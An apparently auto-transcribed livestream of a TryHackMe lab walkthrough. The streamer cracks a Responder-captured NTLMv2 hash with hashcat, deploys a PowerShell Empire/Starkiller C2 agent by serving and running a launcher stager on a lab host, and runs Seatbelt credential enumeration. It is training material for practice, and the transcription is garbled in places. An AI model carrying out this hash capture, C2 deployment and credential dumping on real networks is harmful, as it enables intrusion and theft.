I'm gonna bite the bullet and just try and do this hashtag. Like, can we trust it? Can we give a little bit of time? Can you tell me if this stream starts to go to shit? But let's do it. Try crack station? Seriously? Would that work? There's no way. Oh, okay. Yeah, so like now I see it. I'm looking at the preview and I see the stream going crazy. I mean, that's better than nothing as long as the audio isn't horrendous. I hope you don't mind me just being a robot more than usual. We can try and go to crack station though, I think. Audio is good. Cool, I appreciate you guys. Thanks. Let's close out some of this stuff. Let's try crack station. And I'm sure, I have faith that hashtag will be able to crack it soon enough. Yeah, if you're only here for the audio, then hell. Just leave this on while you're going to bed. Except for when I'm screaming and laughing and having a great time because of you guys, it's all too much fun. Can this just straight up do it? Like, there's no way. Which can't handle the leetness. I don't think crack station would be able to solve this. I'm gaming and listening, basically. Wow, you guys are fantastic. I appreciate you all listening in, even while you're doing your life. Is that how it normally is for Twitch people? Like, I wouldn't be able, because whenever I want to watch optional stream or the Cyber Mentor stream or Nomsack stream, I'll have to sit down and watch it. So, yeah, if crack station requires the NTLM, is that the very, very last part? Like the big, big long thing? Or is it the two pieces in the front, these two hex pieces? No, I mean, obviously all of it is hex. That's probably a very useless thing to say. I don't know. Come on, hash cat. You've got this, buddy. Wow, watching three YouTube videos, two Twitch streams and playing an FPS. You guys are insane. The smooth jazz radio voice, I appreciate that. So, my dad, my father, like my IRL dude, my father owns a radio station. Some fun facts. Originally, he owned an easy listening smooth jazz radio station. And then it became oldies, like old school songs and music. And then it became, I think, news and a talk radio. So, when I was a kid, I would do, I mean, I guess I am still a kid. When I was younger, I would do events with the Kiwanis Club and the public service, community service stuff. So, I get to be on the radio a little bit just to talk about some of those things, but I guess that's where the stream is lagging. Is it audio or? I'm pretty sure my Dell XPS 15 does have a GPU. I know I use, yeah, I can show the status of hash cat. I'm on live papal. Sorry, yeah, video is probably like crapping the bed. I'll press status every now and again. 10 days remaining. We've been going for four and a half minutes. Yeah, why don't I just have a separate cracking server? Jaxi, is that really how long it's gonna take? Serylix, I know you've been like, oh, Serylix, we're going for longest stream, boys. Here we go. 24 hours I can't do. I could do like 11 hours. Oh, Wester said, holy shit. Is that because I could do 11 hours? I don't really want to. Yeah, sorry, the stream is lagging because I'm actively trying to crack a hash. Sorry. I'm sorry. Collab cat is my best option. Okay. So we have a clear diagnosis though that this is going to take more than 10 minutes. Is that fair to say? I think it's worth learning the collab cat. Oh, and now the lag is just straight up gone. Or a huge GPU machine on Amazon. That's the thing, that's an option. I could spin up some of my GCP Google Cloud. Okay, Serylix has given me the yes. This is certainly going to take more than 10 minutes. Now we're at 15 FPS. I guess I can just like stop this then. Can I serenade you? Yeah. I can do like a stupid radio intro. You guys will laugh about being on the, all right, I stopped the, I stopped hash cat, so. I guess now I have to go figure out collab code or get us a different machine. So let's try that. I'm sorry, I just like seeing others suffer. Let's just go back to trying this, I guess. Yeah, back to smooth as butter live stream, I hope. Anyway, check the GPU specs please. Run anyway, get hashes to crack. Go to this page in your web browser. I'll do it. Ah, oh no. Realistically, I guess you don't actually need, I guess I don't exactly need to like hide this thing from you. Enter my authorization code. Where is the input box to actually copy that and paste that please? The offset goes brr. You guys know my email address. I put that thing everywhere. Run, paste, enter. Please God, please. Oh my gosh, it did it. All it took was an extra attempt for some reason. Yeah, now compile hash cash. Do I need it? No, I don't need to put an input in here. Come on, hash cat. Now we're using those sweet, sweet cloud resources. So, hey, what do we need to do to like amp up the stream here? Like what would you guys want in a Twitch stream to make this more fun and make this right? Like, obviously it'd be good to spread the word. It'd be good to like, okay, scream about this on Twitter and LinkedIn and Instagram and try to drive some hype to doing this sort of thing. Keep collab cat up for future use as well. Roger that. Thank you, Sirilx. Good to know. Am I pronouncing that right, by the way? I'm very sorry if I... Yeah, yeah, doing it more often. Yeah, absolutely. I hope to do this more often. We'll see how I can balance my sleep schedule. The past couple of days, we have been trying to stay up to prepare for her night watch. So, the other day we stayed up until two in the morning and then yesterday we stayed up until four in the morning because you're gonna have to be up till seven in the morning now. So, unlock subs. Yeah, how do I do that? What do I need to do to get subs or whatever? I hope you do this often but earlier. Yeah, we'll see. What else? Krillik Roger. Thank you. I'm very sorry. Gotta get affiliate. That'd be cool. I'm not like gung-ho about it, you know? I don't think I am. I'm not a... It's weird to me. I'm out of my element because I'm not like a streamer, you know? I'm not a Twitch streamer. Oh yeah, it says on your dashboard how close to affiliate you are. Creator dashboard. Let's go find out. Is this thing done? Are you still compiling HashCat? Yeah, okay, good. Insights, channel analytics. Twitch affiliate needs to have at least eight hours broadcast in the last 30 days. Oh, we're gonna get that done tonight, guys. At least seven unique broadcast days in the last 30 days. Roger. An average of three concurrent viewers or more over the last 30 days and 50 followers. I think I have more than 50 followers. I think we have more than three concurrent viewers. Orpheus, thank you, man. I appreciate the follow. Is HashCat done? I feel like it's done. Was it just done and it just didn't tell me? I'm sorry. I'm sorry. HashCat version. Okay. Do I need to do that? Make directory word lists. Yeah, the unique broadcast one is basically if I stream seven times within 30 days. Yeah, yeah, yeah. Thanks so much, Cortex. I really appreciate it. I'm grateful for all the nice words. Okay. So we need to get this rules thing into the Google Drive and the hashes that we're trying to crack and rock you. So if I go to Google Drive, I'm gonna move this over here so you guys still can't see it. Status of cracked? What are we referring to? I've been trying to get content out lately and I had a good streak going on for like the past couple of days. I was super duper proud of myself because I was like, sweet. We got a video like every day for the past two weeks. This never happens. And that was a blast. And then I broke it like two days ago. Oh, it already downloaded Cyclist, which has rock you. Roger that. Oh yeah, it does, doesn't it? Well, I need to get these hashes on the box or in there. So I can bring this down I think now. I think this is safe. Can I click in that, please? Yeah, I appreciate you checking out the Google CTF videos. Those seem to be really well received. So I hate going back to my terminal because I see the hash cat output and I'm like, gosh, if only it had solved it. If only it cracked it. Upload, please? Upload, pretty please? Gosh, can I please click on this? Why does it not do anything? You're getting an invalid link for the Discord. What are you opening? Dot hash cat. Why does Google Drive not open any of the folders that I'm clicking? Sorry, getting like kind of irritated at that. That's annoying. Can I search for hashes and just get there? I mean, yeah, I guess I could just kind of echo that in there. Does that thing have internet connectivity? Because I'm gonna need to download that. Yeah, that's a good point. That's a good point. Let me bash. Please go. Here I am. Okay. And I apparently still can't see anything that I type. So hash cat. Let me move this up for just a quick second before I just get a sanity check that you're not seeing anything in my Google Drive. CD that location that is mine. Unless there's a lot of stuff in there. Dot hash cat and hashes. Good. Okay, now I'm in that directory. Now where did they stink and put? Oh, that's not helpful whatsoever. Where did they stink and put rock you? Is that in sessions or whatever? I guess I can go take a look where they actually put that in the previous ones. You wanna see the feed pictures? Oh, it's in wait around and root word lists. Okay, that makes sense. Well, let's see if, let's see how much, if I was able to successfully hide bad content. I think you saw some of them already. Wait, the what? Ellis root. Do I have W get? I do have W get. All right, let's get the, let's get this. This is agonizing guys. I'm really sorry that this has taken way too long. I think you can get a reverse shell from that. What? I mean, I guess I could do it. That might behave a little bit better. That might be easier for me to get into or look at. Actually interact with this thing. So I need the rules and I need rock you. W get. Paste. Great. We've got the rules. Now let's get the hash. Hashes. Oh dear God. Oh dear God. It was this thing. It was this big thing. Okay. Then let's get back to our browser, wherever the heck it is. Let's close out the other stuff that we don't need currently and let's echo all of this into a hashes.text. Ellis, can I cat out that hashes.text? And that's the whole thing. Okay, great. Now I want rock you. And it was probably insect list. Oh, that's just straight up link. Copy link location. Let's download that. W get this bad boy. Excuse me. That was probably, dang it. I need you to copy the link location, not that link. Copy link location. I don't want that. I want the real link, not the Google redirect link. You know what? Fine. Fine. We'll do a little F12 here. Check out that network tab. Stop, please. Network. And we'll get that get rock you. I think that's literally it. I please, please, please copy that line. Holy cow. Can I have the line, please? We did it guys. We copied and pasted it successfully. Okay. Okay. He's beginning to lead. Oh, I'm not nowhere, I'm nowhere near lead enough. And that's the problem. We've been struggling to run a hash cat on a cloud computer that will work for us. We got rock you.text. Let's remove that stupid URL crap. I'm just gonna wildcard that and hopefully don't remove literally everything in the drive. Thank you. Okay. Is hash cat a command that I can run? Hash K is not a command that I can run. How about hash cat? If I could actually see what I'm typing. Amazing. Let's get back to our terminal and grab the syntax here. You know what? Let me actually modify that as smidge because I literally can't see a darn thing when I run the command. So it looks like we need a hash cat tack m 5,600 to run NTLM version two run rule to rule them. All hashes.text and rock you.text. And I guess we don't need force anymore. Yeah. See, I really wish I had done the reverse shell. I'll have to try and see if that works. Actually, let's, part of me wants to do it now. Just start hash catch on who cares. Alrighty. There he goes. He's doing it. Did it do it? I'm confused. Whoa. He cracked it. That was a much better solution. We finally did it. All the way, all the way, all the way, all the way, all the way, all the way at the end. We should have a cracked password. And it is throwback 317. Wow. Oh, when I run it locally, I was stuck on 0.03%. Are you kidding me? Wow. Okay. Now we can put that. Yeah, sweet. I want, I'm very pleased we did that. Thanks so much for making me go down that route, everybody. That seemed to work really, really well. So using responder and that was pseudo. Yeah. Definitely, definitely glad we got that figured out. Responder.py. It was iton zero and then rdw and tack v. We eventually caught a LLM and R request and we have that saved here. And then we were able to crack this with collab cat, online hash cat, hack hat through Google Cloud. Sweet. We uncovered the password. Let me grab the syntax that we just used for that though. Do I have that saved? Yeah, he's right here. Sorry, frantic sublime text traveling. Progress. Oh my Lord, eventually we finally did it. How long did that take us guys? We've only been doing that for like an hour. Yeah. So, so thanks. Jackson is really going on about Pintest WS. Let me pull him down and try this thing. Is there like a demo at all anywhere? I'll definitely have to keep this in mind. I probably should be using like cherry tree or something. Hey, thanks, Wester. I really appreciate you tuning in. Yeah, I'll be doing this again tomorrow. So if you really want to hang out for some reason, that would have been great. I'd love to see you guys tomorrow. Now that you know how to crack capacity using a wordless and we got it. So throwback 317. Success. Building your own dark. Darkstar. Whoa, I get the joke guys. I was good. Building your own darkstar. You can't recreate him. He's too, he just can't. He's too unique. Stop scrolling. Now that we have some footholds on our network, we need to begin to set up a commanding control server to gain persistence as well as escalate privileges. Commanding control server overview. A commanding control server is used as an interface to upload and control various post exploitation tools without interacting with the target itself. Consider C2 as a means for mass management of exploited targets for further usage, be lateral movement, information gathering or otherwise. Star killer. What? So I haven't heard a star killer before. I'll admit. I will admit. This is apparently a big thing though. Let me check out that. Yeah, just download that please. Let me check out this repository. What is this thing? Star killer is a front end for PowerShell Empire. It's an electron application written in view. Okay. If you'd like to contribute, please follow the contribution guide, et cetera, et cetera. Great, let's just do it. So. Have we been catching any of the really cool hat? Yeah, yeah, we've got like four more, four more NTLM hashes or LLMR responses. Awesome. So let's make a directory for star killer. And let's actually move the download star killer. Star killer? What did that download us? Star killer lower case. Star killer here. And what is this thing before I run it? Oh, it's a program. Okay, cool. I'll trust you blindly. It's already dying. Oh, wait, we got a little Gooby. Got a little Goop here. Pseudo, that thing, no sandbox. Want me to Pseudo it? I just downloaded this thing. You want me to Pseudo something I've never heard of before? Just kidding, I do it all the time. Pseudo, star killer. No sandbox. No sad box. It was a typo. Electron, ew, yeah, everyone was like, hey, none of it, oh no, electron. Great, what is this? I have to log into this thing, apparently. Can I zoom in on this? No. It's okay if it's electron if you're an attacker. That's fair, you know what, I'll buy that. And then get empire. Do I actually have empire? I don't think I do. Let's move up a directory. I don't think I do. All right, they give me the repository so I don't have to go there myself. Let's not do it. Oh no. Oh no, get empire and setup install. And that probably needs me to be root, but are you dislike doing that? Should I have registered an account with star killer or something? Oh, I guess he's just gonna go. I guess he's just gonna figure it out. Maybe he would run pseudo commands in his install and they probably already detected that I had entered pseudo earlier. So hey, thanks so much for those new followers, Wutsunatar, I appreciate that. Yeah, I remember a PowerShell, like everyone is at, oh no. Oh no, empire is dead. Empire is not cool anymore. Empire is not hot, but then I think BC security was like, no dude, it's still cool and they just took it. So they're all about it, which is awesome because yep, yep, yep. Ooh yeah, the whole C2 matrix is coming together. Dude, Bryson Bort, dude, George O'Killis. I don't know if I'm pronouncing his last name right, but those guys are incredible. Bryson's a great guy. We tag each other for pizza Friday on Twitter all the time. If you guys want weekly pictures of pizza, follow me on Twitter. While this is installing, I am going to put on the be right back display so that I have an opportunity, be right back in three to five minutes, so that I can actually take a bio break and be human. Just a second everybody, I'll see you soon, I love you. Hello, I've returned. Kind of the problem with drinking a monster, you know? Oh, thanks for sticking with me everybody. All right, looks like we're good, I think. Where'd you put this thing? Data, empire, here we did it, you did it. I'll make that visible so you can actually see it. And let's get back to what we're doing. So, in empire, what happened? I hit tab, I hit tab. In empire, we have this ready, so I can sudo dot slash empire and rest, rest. It's just like letting it run as like a server. Is that right? Ooh, very slick. Okay, and then it just runs. So, Starkiller, is that supposed to run in the background? I don't know, let me just do Starkiller now. I probably don't need to be having responder on anymore. Hello everybody, it runs as a rest API, very slick. So let me go into Starkiller and do the Starkiller one more time. Do I need to sudo that? They're sudoing it, but let's do it. This is a throwback for those of you that are just joining asking about this new room. Yeah, this is the new TriHackMe networks that acrylics, sorry, let me properly pronounce your name. I'm very, very sorry if I keep ruining that. And then we have some default credentials for empire admin and password. I hope that set it up as it should. Please, please, please, please. It did it, amazing. Wow, sudo everything. Yeah, sudo chmod777 recursive. If you properly set up Starkiller and empire, you'll be mouth of listeners panel after logging in. I did that, incredible. Deploy the grunts. Okay, this is new for me. So I normally interact with empire like through the command line, but I'll be having fun exploring Starkiller. I had nothing wrong with that. Sudo vim, exclamation point bash. We'll begin our movement through the network with our second foothold on throwback prod. Your team has informed you that the best plan of attack is to plant a commanding control agent on a throwback prod and attempt to escalate privileges before assessing other footholds and laterally moving through the network. Did I actually have access? Starkiller uses, so I know I got credentials because we just got Peter Jay's password, but I didn't do any winRM thing to get on the box. Is that something that I can do? Let me check that Nmap initial cause I saw winRM, winRM585, there was a, there was a winRM port open, 5985, is that right? Nmap didn't find it because I didn't do that. I didn't do a full port scan and it probably didn't check for that. Maybe, I don't know. Let's just continue to follow up. Let's go ahead and create a listener. Selecting the create listener. We will use an HTTP listener, Roger Dodger. Can you guys see this okay? I'm really sorry that this is gonna be kind of dark. HTTP, we'll run it on my local host, not local host, I'm sorry, but my actual ton zero IP address. Lot of shells going on. They actually had RDP open. Okay, so don't use it. Don't use RDP. Yeah, what am I doing? APS, AS ton zero, that's me. So I need to change my host to listen on. Bind IP should be everything. Wait, host should be ourselves, right? Yeah, and then the port we wanna listen on. So they're using 53 to do the weirdness DNS, stealthy stuff. Port, we gotta specify that. I'll go 53 just to kind of keep it as they are suggesting. And then we'll have an active listeners. And it'll just do it. It'll just do the thing. Okay, excuse me. Oh, I probably need to pseudo that. Wait, I did pseudo that, didn't I? Address is already in use. Port 53 is already in use. What's happening? Let's go for quad six. Oh, responder uses 53, thank you, thank you. Responder still doing his thing. I gotcha, thank you. Now we already created the listener. So if I go back and go into Stagers, now I have a generate Stager button. And that should probably be something like, okay, yeah, Windows and they're gonna use a batch script. Launcher, scroll, scroll, scroll down to Windows. Launcher bat, very cool. Do they, and grab our HTTP listener that we have. They're just using PowerShell, is that right? We have our Stager ready to deploy to the target. Depending on the Stager type you select it will have to download or copy and paste the Stager to the target machine. So, oh, they got on the box already with Peter J. Should I do that with Evil 1RM? Oh, no, we have SSH, duh. That's pretty cheesy, easy. So let's whack that guy, just make him. I can copy that, right? And let's put him in home, John. CTF, try hack me, throwback, hosts, prod. Launcher bat, please, please, please, please. And so that's still running as the pseudo, the pseudo. So that's probably created as root layer. Let me just chone that, because it's pseudo chone, John on launcher. Can I have that, can I have that, can I have that, please? I got it, now he belongs to me, fantastic. And that's a good, good batch command that I could just whack in there. Then they just serve it and they get on the box. Let me get on the box, I'm not in there yet. I still have this firewall open. I still have a root firewall shell that I can, I guess keep, but let's get to CTF, try hack me, throwback. And can't the read me one more time just so I can grab that IP address, production. Let's SSH to Peter Jay. Do I have a video on how to use Limpies? Admittedly, I don't think I have one that explicitly defines it, like showcases it, like, I don't know, starting to use it for the very first time. I do use it a lot of videos, and then really it's just kind of downloading it and running it. And Peter Jay's password is throwback317, throw, throwback317, am I wrong? Oh, may or may not need the, am I misunderstanding? And I'm totally cool if I am. I realize that this is kind of new for me. Peter Jay, Peter's Jay. Oh, thank you. Please let me out. Please let me out. Thank you, EvilWinRM. I'm really, really grateful that you really like me, but I wanna go home. Okay, fuck. That window's dying. Thanks, SSH, yeah, yeah, yeah, let's just do SSH. Thank you. Throwback, SSH, Peter's Jay. Don't forget the Jay, John. And that IP address, throwback317, don't fat finger it. Oh my goodness, we're on the box. I'm in. Great, let's move into a window's temp. Can I clear screen in this? Oh, I can't, oh God. All right, time to move my face so you can actually see it. Wee, there I go, the top of the computer screen. Now I just can't control L ever. CDC windows temp. Dur. There's nothing in there. I am in the right directory, yeah. Echo A to A, dur. What? I'm confused. Am I not in a real directory right now? They just kind of did it from their home directory. And I guess I can, I guess they can just do it. Yeah, you say I'm in every time you get into a box. Like really cool, you'd be like put your hoodie on. I'm in. All right, enough muffing around. And my face is in the way again, God dang it. This is why I guess you have to have the Twitch stream that's really cool that you're over in a different aspect of the computer or the display. Great, whatever. Now let's go ahead and download this thing. I'm in PowerShell. So I am in PowerShell, am I? Am I in PowerShell? I'm not in PowerShell. Can I just run PowerShell please? I can just run PowerShell. And now I can control L. Life is incredible. Bring my face back down. Thanks for hanging out everybody. Now, let me just sanity check. I'm sorry, I just wanna see, is that just not a directory? Oh, I just don't have access to it. Whatever. User profile. Okay. Back in the home directory. Let's get this launcher ready and let's stinking get our agent running. So we put this in hosts prod and then let's Python TechM, HTTP.server. Great. And then let's WGet, which we do have because now we're in PowerShell. So it's an alias for invoke web request. Ooh, that's a good call, Jaxi. If I'm butchering your name, also please forgive me. Is that Jaxi Muke? Yeah, I know Krillik, so many shells. I'm stupid. HTTP, what the? FOOP is my IP address. Every single time, I don't know. This guy. WGet him, port 8,000. Let's go to, oh God, what, what, what, what happened? Terminator? No, no, it's the curse. As soon as Krillik says that there's too many shells, Terminator just crashes. Cause we're a responder? Oh my God, I've never seen that happen. That's never happened. Cool, cool. Are we still in, is our VPN connection like still alive? Yeah, F in the chat. All right, let's get some Peter's J action back. What, and friggin' Starkiller's gone. Oh my gosh. No, are you kidding? We gotta do it all over again. Yeah, Terminator was like, no more of this shit, John. All right, let's get Empire back in action apparently. Same with Starkiller. Is this all still there though? Oh no, oh yeah, no sandbox. Forgot that, forgot that argument. Starkiller's back and we still have a listener and we still have a Stager. Okay, so that's actually all good. Empire's still with us. He's got one listener rolling, so I can't get over that. Wow, that was nice. Terminator, I don't think it actually has a screen limit. I like it's weird. I feel like Responder just gave up. He's like, you know what? I'm not doing this shit anymore. I just have kept finding the same LLMNR response over and over again. Throwback 3-1-7. I'm in. You just have to say it now. And we need our, oh my gosh. What is this? Is this? Is this real life? What is it that's killing it? Holy crap. Yeah. All right, can I do a little like pseudo-opt Starkiller? Star, whatever, no sandbox? Will that just do it for me? Probably not. Someone says, yeah, just check top. Oof. No, I'm the only one logged in right now. As far as I can tell. All right. Let's take it old school. Let's just run a regular old terminal over here. And let's fire up T-Mux because the internet's mad at me and keeps telling me to use T-Mux. So let's friggin' install T-Mux. We're having fun, ladies and gentlemen. That's what you do on a Twitch stream. Yeah, so much for persistence. Well, this video recording is still going on. And I guess we've been going for like three hours and 22 minutes, so. Yeah, exactly. Like I've never seen Terminator just choke. Alrighty. Opt. Is Empire just still running? Like, do I need to start that again? It was on 1337, right? I don't know if he is. It's going to Empire. Pseudo not slash Empire. He doesn't need anything funky, does he? Oh shoot, he needs to be running as Rest. And T-Mux. Okay. Control-B, N. Control-B, C. That's it. Control-B, zero. Now I got two windows open. Control-B, N. How do I rename? Whatever. It doesn't matter. Stinking, start, Empire. Pseudo Empire, Rest. Yes. Oh, John's using T-Mux, everybody. All right, now he's running. Let's get to Star Killer. Pseudo dot slash Star Killer. No sandbox. Please don't die. Please, please, please. Don't give up. And maybe I just need to keep the font size down. Maybe it was just blowing up. Cause of all that. Am I watching Ipsak? No. He would actually be doing a good job. Okay. Now I'm not getting a response. That's not fun. Did I drop the connection? I don't know why I'm trying to pseudo ping just then. Reee. Is OpenVPN still going? It's a thing, dude. He's up. He's kicking. Did that machine die? I don't think so. So what else do we got? The network, no, he's still running apparently, but I can't ping him anymore. All right, let's do a quick little bounce, maybe. Hope you guys don't mind. Try refreshing the page. Oh yeah, maybe he just kind of clobbered himself. I do it all the time. Sometimes I clobber myself. Network status stopped. I wonder if that's why a responder was like, oh no. Wow. We took so long that the network gave up on us. They said, you're clearly not gonna be able to do this. So, all right, now you're running, so you say. Now that I've killed my VPN connection, let's CDCTF track me. Oh boy. Wow. This has to be excruciatingly painfully for you guys. I don't know how you could remotely enjoy watching this. The network decided to throw you back. Nice. No. Don't tell me it's a different password right now. Don't you dare tell me that it's a different password now. Oh my gosh. No. Am I remembering it wrong? Am I remembering it wrong? Give me back, give me back to prod. Tell me the stupid password. No. Krillix, Krillix, you're saving me. It's gotta be the same password because, right? Yeah, yeah, yeah, okay, okay. Thank you. It's gotta be the same password because that was the answer that it actually asked for. So there's no way that that's gonna change and be dynamic. It's probably just gotta take a little bit of time. Thank you for saving me. Yeah. Thank you for saving my sanity. I'll wait. I'll take some, I'll give it a little bit. So I'm probably going through this at a very, very slow pace. Is that right? Krillix, like, am I moving slow right now? I mean, obviously I'm tripping and stumbling, but how long would you expect this to take a person? Like, when you were designing this, when you were developing this, would you feel like, hey, we're in, great. Like, did you feel like this would be a day if someone were going nonstop? All right, we're in. Thanks, California. I appreciate it. THM, throwback. I've seen most users take 20 plus hours. Okay, that's good to know. I mean, obviously I'm still, I'm sure that I'm going to get to something where like I have no idea and I do not understand what's happening. That's, that might pretty well happen. Please, please, please get me to the point where I can actually download this thing. We got so far, I was like typing this command previously and then it died. So fingers crossed, my shell does not give up on me. What did we call this thing? Launcher.bat, yeah, launcher.bat. Got it, downloaded it, and it didn't save it anywhere. It just kind of made the request. You're the best, thanks so much. Do it again. That's also reading all the content in the lab. Yeah, and digesting everything we throw you. I get that, I get that. Okay, so what should I see when I dot slash my launcher? I am running in PowerShell, so it would make sense for me to dot slash it and it'll just do the thing. Your agent will check back in the agents tab. Okay, so I am in the agents tab just so I can see this happen and let me do a little dot slash launcher.bat. Wack, please goodness. Please, please, please. Do I have a new IP address? Oh, no, I have an agent. Amazing, okay, okay. So, ooh, I can interact with him. I can click on him and do things. We're done, whoop whoop. My answer is correct. My no answer needed answer answer is correct. Sweet, okay. Now that we have an agent on the machine responding with Starkiller, we can explore the command interface of Starkiller as well as the modules that Starkiller has. Is it really Empire or is it Starkiller? You know, I think Empire, is it Empire? It really, that's the engine in the background. Starkiller is kind of an interface, the front end, right? I don't know, I probably sound like a jerk saying that. I don't mean to. The agent can send any normal shell commands such as who am I or LS. However, that's not utilizing the full power of Starkiller. Right, it can do a lot more crazy cool stuff. Prince Booter? One of the major features of any C2 server is the ability to use modules. These are typically tools or exploits like Mimikatz, Rubius, and Prince Booter that can be loaded in the server through the agent. Starkiller has many modules, all their own uses. Take some time to explore the modules menu and play with some of the modules. Okay, I'll have fun. I really wish I could zoom in on this. Oh, zoom in, plus. Ah, now you guys can actually see what I'm doing. Please enter a module name. Persistence, I'm on Windows right now, that wouldn't do much. Situational awareness, that's a big one, isn't it? I'm just gonna explore here. Trollsploit, that's fun. Oh, California, thanks so much. I don't mean to be on your TV. What am I doing? Look, I'm on TV. Scheduled tasks, is this any chance getting uploaded to YouTube? So yeah, I've been recording for like the past three and a half hours. Unless my computer runs out of space, unless this video takes up all the room left on my hard drive, hopefully I'll be able to save this video and slap it on there. I don't know anyone that would actually wanna watch through all of this because there's probably a boatload of stuff, but if you wanna enjoy the fun that we've been having and you can view it in Twitch videos, yeah. Do you have to be subscribed to be able to view in Twitch videos? I'm just understanding and trying to learn that because PowerShell credentials, Rubios, Invoke Kerberos, Enum Credstore, let's try that thing. Does that work? How do I click run? I don't know, that's not what I wanted to do. I wanted to run. What? I made the thing now, oh, submit. Stupid zoomed in. There we go. Is it doing it? Job started. Pick the session first. They'll do enumerate credentials to her. Gotcha. Sorry, yeah, everyone was like, John, stupid, just scroll down, you idiot. Well, cause I'm zoomed in too much. Okay. Star Killer is great for saving information and logging actions, cause it'll automatically save all credentials that are found. Sorry, yeah, I know the zoom in was apparently very disorienting. Okay. Oh, oh, oh, oh, I was, yeah, I should be in like the modules page. Holy cow. Damn son, where'd you find this? Oh, sorry. I didn't mean to blind you. We got this dark mode going on for Star Killer and then I try and alt tab and try hack me. He's like, wow, light. Okay. There's a lot of stuff that power, I'm gonna switch, I'm gonna switch to a different browser. I'm gonna switch alt tab, the white. Boom. Sorry. A lot of modules. Read the above text. And familiarize yourself with the menu. Credentials. Everyone was like, you blinded me, John. I needed a warning in this video. Okay. And reporting. Oh, it just keeps track of all those. Oh, sweet. That is really nice. You know what? I'll give it that. I feel like less elite hackery, you know? Like I feel like I'm not Elliot Alderson. I'm not hacking in the Gibson or anything right now because you hate yourself like, I'm using a GUI program, I'm a noob, I'm a script. But I'm like, no, this is honestly awesome. I don't, better than setting light mode discord screenshots. Thanks. Thanks, Nightwolf. I appreciate the call out. I feel seen. You have a C2 agent responding back from throwback prod. Now we need to elevate our privileges in order to dump hashes and passwords with memecats. Your team has suggested to run a numeration script like wind peas or seatbelt. Wind peas I've used. I actually had just used that a little bit ago for the hack the box remote video. And I'm trying to do a little bit more of a, what if you add the credentials that you have? California, you're a genius. Thanks so much. I should actually do that. Add credential. I know a plaintext password for a domain user throwbackpetersj. Sorry, I'm just scrolling through. I know that's insanity looking. What happened? Did it kill my CMD? Whatever, it's just throwback. Thowback, throwback. Petersj. Oh no, I can just specify that there. And throwback317 on the host of, we're on throwback prod. Did I do that right? I think so. Okay, whatever. I probably didn't need to exactly do that. Now I wanna go ahead and run seatbelt. Your team has suggested to run a numeration script like wind peas or seatbelt to enumerate what services and privileges may be misconfigured on the device and be exploited. Well, I'd be at a venture con this year. It'll be online. And I know that's kind of weird. I'll still try to hang out. Obviously I'd love to. And I wanna play the CTF and do all the fun stuff. But man, the whole virtual conferences, the whole remote events is kind of a bummer. I'll be honest. I love being able to see everyone. I love being able to hang out. I love just chilling with everybody. And it's a family reunion, you know? It's, oh, Krillix is saying, hey, I may or may not be revamping the Empire Room right now and adding and creating custom module exploits. Hype, Hype train, that would be incredible. I'm very much looking forward to that. I hope everyone else is. Thanks, Krillix. Yeah, last year, last year of venture con was fantastic. It was really, really cool. I'm very, very grateful that they were letting me squeeze in to that. I guess I don't really count any of the categories now because I am no longer active duty and I am no longer a government contractor. So someone would have to be like, yeah, John, come on in, we like you anyway. But I would love it. That'd be a blast. The purpose of this task is to show you how to load and execute tasks in Star Killer in order for seatbelt and the privileged escalation to work, you should run seatbelt over an RDP session using the pre-compiled binary that can be found here. Ah, we're doing RDP stuff. Okay, so this is new for me. This is uncharted territory. It's definitely specter op stuff. Ghost pack, you can see the logo there, Rubius, Kerberos. What is that? What is that joke? What is Rubius? I realized that we are now Googling Harry Potter. Maybe I'm reading into that and it literally doesn't matter. So Rubius is named after Rubius Hagerty who had to wrangle his own three-headed draw. Okay, I follow. Windows cred manager doesn't vibe without a desktop session. I follow. Oh, I'll dig that. Okay. We can use seatbelt module within Star Killer to help enumerate the device and find potential attack vectors. Oh, let me actually grab this first. I kind of just jumped right over that and that was probably a bad idea. Moving to that op directory. Let's go ahead and get clone this. Ghost pack compiled binaries. Sweet. Now what have I got? Rubius, safety cats, lockless seatbelt. Okay, there's seatbelt, sharp. Some of the sharpest of your stuff. Okay, so we want to run situation awareness host seatbelt and let it do its thing. Is that all? Can we just trust it to do it? What is seatbelt though? Before I like, I do wanna learn more about this. Okay, thanks Google. I appreciate you. Oh, here's a Wikipedia article. What the hell is seatbelt is? Thanks. I do wanna learn this rather than just kind of remotely, or roughly walk through all the steps. Seatbelt is a C sharp project that performs a number of security-oriented host survey safety checks. Okay, so it is an enumeration tool, it sounds like. Kind of see what might be broken and wrong. Help you look for enumeration. I mean, I guess I did read that. It did say stuff like windpeas or seatbelt to enumerate what might be wrong. Gotcha. Okay, let's do the thing. Let's go to the modules and let's search for seatbelt. And there he is. And if I go into actions, I need to specify an agent and then do it. Okay, cool. Can I see what he's doing? If I go into that modules, is he gonna run it? Oh, yeah, invoke seatbelt. We die, seemingly. Or am I misunderstanding? No, they run it through. Starkiller. I need to take a step back and figure this out for a quick second. You should run seatbelt over an RDP session using the pre-compiled binary that can be found here. Oh, it's doing it, just wait a bit. Okay, sorry. View? No, he's just chugging along. Okay, I'm gonna go read this on the side then. So if he's doing his thing, we will eventually find a credential that is stored within the Windows Credential Manager. So what do I need to do about that RDP thing? Did I misunderstand that? I think the session died. Can I check the agents again? Yeah. Oh, no, no, no, no, now I got something. Getting a lot of access to NIDES, but there are results here. A lot of results. Okay, sorry, that probably looked very sketchy and very weird. There's so much stuff here, holy cow. Okay, I have to scroll through the friggin' the world. Let's make this a little bit bigger somehow. Invoke seatbelt. Cannot enumerate antivirus. I switched the tasks menu for a better view. Oh, like a top-wise. You can either RDP in and run the module with an RDP session in the background, or you can RDP in and pull over the binary and run from there. Okay, I understand. It just won't work. We won't find what we're looking for unless we have the RDP session in. I follow. So if I do a little Remina RDP on my prod, then I'll be able to find it. So all the time that I was waiting, I was just wrong. It was just not gonna return what I needed to find. Throwback prod, let's do some RDP. Yes, username should be Peter's J. Throwback 317. Do we need to specify domain or is he gonna be able to figure that out? John Peters. I didn't know his first name all this time. I feel like I've earned a brother. User.text. Did we already find this? Okay, okay, Remina, you're good, buddy. Now that we've RDPed in, we can run this again. Right, so seatbelt, go on our agent and just do it again. Now we should be able to find it, right? So he's doing his thing. Reporting is gonna do this one more time. And it'll take a little bit, but we'll let that go. So we will see something now that we've RDPed in is what I understand. And it'll give a little bit of time to just let him do his thing. Since we know that there are saved credentials within the credentials manager from seatbelt, we can utilize the Windows Run As to run a file as an elevated user and escalate privileges. We need an RDP session on this device in order to successfully run this command, escalate privileges. I kinda just wanna ask, is that always the case? And this is just me pitching, because I don't know. Windows cred manager has to have a real desktop thing, like network, is that NLA or like network layer authentication that 